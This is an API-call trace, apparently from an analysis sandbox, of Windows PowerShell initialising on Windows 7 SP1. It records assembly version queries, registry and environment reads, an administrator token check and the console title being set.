	[0494.085] lstrcpyW (in: lpString1=0xeb120, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0494.085] CoTaskMemFree (pv=0xeb120) 
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2efa034, puLen=0x24db70) returned 1
	[0494.085] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0494.085] CoTaskMemAlloc (cb=0x20) returned 0x18c300
	[0494.085] lstrcpyW (in: lpString1=0x18c300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0494.085] CoTaskMemFree (pv=0x18c300) 
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9cdc, puLen=0x24db70) returned 1
	[0494.085] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0494.085] CoTaskMemAlloc (cb=0x66) returned 0xf85e0
	[0494.085] lstrcpyW (in: lpString1=0xf85e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0494.085] CoTaskMemFree (pv=0xf85e0) 
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x0, puLen=0x24db70) returned 0
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x0, puLen=0x24db70) returned 0
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x0, puLen=0x24db70) returned 0
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24db48, puLen=0x24db40 | out: lplpBuffer=0x24db48*=0x2ef9c84, puLen=0x24db40) returned 1
	[0494.085] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0494.085] VerLanguageNameW (in: wLang=0x0, szLang=0x1394c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0494.085] CoTaskMemFree (pv=0x1394c0) 
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\", lplpBuffer=0x24db98, puLen=0x24db90 | out: lplpBuffer=0x24db98*=0x2ef9c10, puLen=0x24db90) returned 1
	[0494.925] CoTaskMemAlloc (cb=0x104) returned 0x148170
	[0494.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x148170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.925] CoTaskMemFree (pv=0x148170) 
	[0494.931] CoTaskMemAlloc (cb=0x104) returned 0x148170
	[0494.931] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x148170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.931] CoTaskMemFree (pv=0x148170) 
	[0494.936] lstrlenW (lpString="䅁") returned 1
	[0494.948] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24da68 | out: phkResult=0x24da68*=0x2ec) returned 0x0
	[0494.950] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24da58 | out: phkResult=0x24da58*=0x2f0) returned 0x0
	[0494.950] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dae8 | out: phkResult=0x24dae8*=0x2f4) returned 0x0
	[0494.954] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24da2c, lpData=0x0, lpcbData=0x24da28*=0x0 | out: lpType=0x24da2c*=0x1, lpData=0x0, lpcbData=0x24da28*=0x56) returned 0x0
	[0494.955] CoTaskMemAlloc (cb=0x5a) returned 0xf8570
	[0494.955] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d9fc, lpData=0xf8570, lpcbData=0x24d9f8*=0x56 | out: lpType=0x24d9fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d9f8*=0x56) returned 0x0
	[0494.955] CoTaskMemFree (pv=0xf8570) 
	[0495.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0495.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0495.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0495.661] CoTaskMemAlloc (cb=0x104) returned 0x148170
	[0495.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x148170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0495.661] CoTaskMemFree (pv=0x148170) 
	[0499.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0499.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0500.795] CoTaskMemAlloc (cb=0x104) returned 0xd9760
	[0500.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd9760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.795] CoTaskMemFree (pv=0xd9760) 
	[0500.796] CoTaskMemAlloc (cb=0x104) returned 0x19b950
	[0500.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.797] CoTaskMemFree (pv=0x19b950) 
	[0501.420] CoTaskMemAlloc (cb=0x104) returned 0x19b950
	[0501.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.420] CoTaskMemFree (pv=0x19b950) 
	[0501.422] CoTaskMemAlloc (cb=0x104) returned 0x19b950
	[0501.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.422] CoTaskMemFree (pv=0x19b950) 
	[0501.422] CoTaskMemAlloc (cb=0x104) returned 0x19b950
	[0501.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.422] CoTaskMemFree (pv=0x19b950) 
	[0503.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0503.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0503.672] CoTaskMemAlloc (cb=0x104) returned 0x19b950
	[0503.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.672] CoTaskMemFree (pv=0x19b950) 
	[0503.675] CoTaskMemAlloc (cb=0x104) returned 0x19b950
	[0503.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.675] CoTaskMemFree (pv=0x19b950) 
	[0504.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0504.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0509.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0509.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0511.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0511.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0511.442] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0511.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.443] CoTaskMemFree (pv=0x19bb70) 
	[0512.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0512.114] SetErrorMode (uMode=0x1) returned 0x1
	[0512.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24d9c0 | out: lpFileInformation=0x24d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0512.114] SetErrorMode (uMode=0x1) returned 0x1
	[0517.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0517.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0517.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0517.668] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0517.668] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.668] CoTaskMemFree (pv=0x19bb70) 
	[0517.671] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0517.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.671] CoTaskMemFree (pv=0x19bb70) 
	[0517.671] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0517.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0517.671] CoTaskMemFree (pv=0x19bb70) 
	[0519.628] CoCreateGuid (in: pguid=0x24dd88 | out: pguid=0x24dd88*(Data1=0xa20cd40d, Data2=0xb7a0, Data3=0x4828, Data4=([0]=0x99, [1]=0xd, [2]=0xcf, [3]=0xe9, [4]=0x82, [5]=0xac, [6]=0x28, [7]=0x4e))) returned 0x0
	[0519.631] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0519.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.632] CoTaskMemFree (pv=0x19bb70) 
	[0519.635] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0519.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.635] CoTaskMemFree (pv=0x19bb70) 
	[0519.637] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0519.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.637] CoTaskMemFree (pv=0x19bb70) 
	[0519.644] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0519.646] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24da30 | out: lpConsoleScreenBufferInfo=0x24da30) returned 1
	[0519.653] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0519.653] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24da30 | out: lpConsoleScreenBufferInfo=0x24da30) returned 1
	[0519.654] GetVersionExW (in: lpVersionInformation=0x24d9c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d9c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0519.657] GetCurrentProcess () returned 0xffffffffffffffff
	[0519.658] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24da58 | out: TokenHandle=0x24da58*=0x308) returned 1
	[0519.662] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d978 | out: TokenInformation=0x0, ReturnLength=0x24d978) returned 0
	[0519.663] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xf7280
	[0519.663] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0xf7280, TokenInformationLength=0x4, ReturnLength=0x24d978 | out: TokenInformation=0xf7280, ReturnLength=0x24d978) returned 1
	[0519.664] DuplicateTokenEx (in: hExistingToken=0x308, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24dad8 | out: phNewToken=0x24dad8*=0x304) returned 1
	[0519.665] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d978 | out: TokenInformation=0x0, ReturnLength=0x24d978) returned 0
	[0519.665] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xf72b0
	[0519.665] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0xf72b0, TokenInformationLength=0x4, ReturnLength=0x24d978 | out: TokenInformation=0xf72b0, ReturnLength=0x24d978) returned 1
	[0519.666] CheckTokenMembership (in: TokenHandle=0x304, SidToCheck=0x2fd4990*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24dae8 | out: IsMember=0x24dae8) returned 1
	[0519.666] CloseHandle (hObject=0x304) returned 1
	[0519.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0519.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0519.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0519.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0520.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0520.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0520.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0520.978] CoTaskMemAlloc (cb=0x804) returned 0x1b952880
	[0520.978] GetConsoleTitleW (in: lpConsoleTitle=0x1b952880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0522.027] CoTaskMemFree (pv=0x1b952880) 
	[0522.052] CoTaskMemAlloc (cb=0x804) returned 0x1b954130
	[0522.052] GetConsoleTitleW (in: lpConsoleTitle=0x1b954130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0522.052] CoTaskMemFree (pv=0x1b954130) 
	[0522.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0522.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0522.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0522.054] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0522.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0522.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0522.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
